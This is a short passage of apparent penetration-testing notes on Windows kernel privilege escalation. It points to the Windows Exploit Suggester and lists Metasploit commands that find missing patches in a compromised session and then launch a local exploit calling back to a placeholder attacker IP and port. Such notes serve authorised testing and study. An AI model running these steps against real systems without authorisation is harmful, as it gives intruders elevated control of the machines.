Kernel Exploits
Windows Exploit Suggester
You can run the windows exploit suggester script to check for missing patches.
Metasploit Exploit Suggester
Not sure if it's the same one as the Windows Exploit Suggester, but there's also one built into metasploit.
Once you have a metasploit session, you can run the exploit suggester:
use post/multi/recon/local_exploit_suggester
set SESSION SESSION_NUMBER_HERE
run
Then you can use the exploit it found:
use exploit/windows/local/EXPLOIT_NAME_HERE
set SESSION 1
set LHOST YOUR_IP_HERE
set LPORT SOME_OPEN_PORT
run
Last updated
Was this helpful?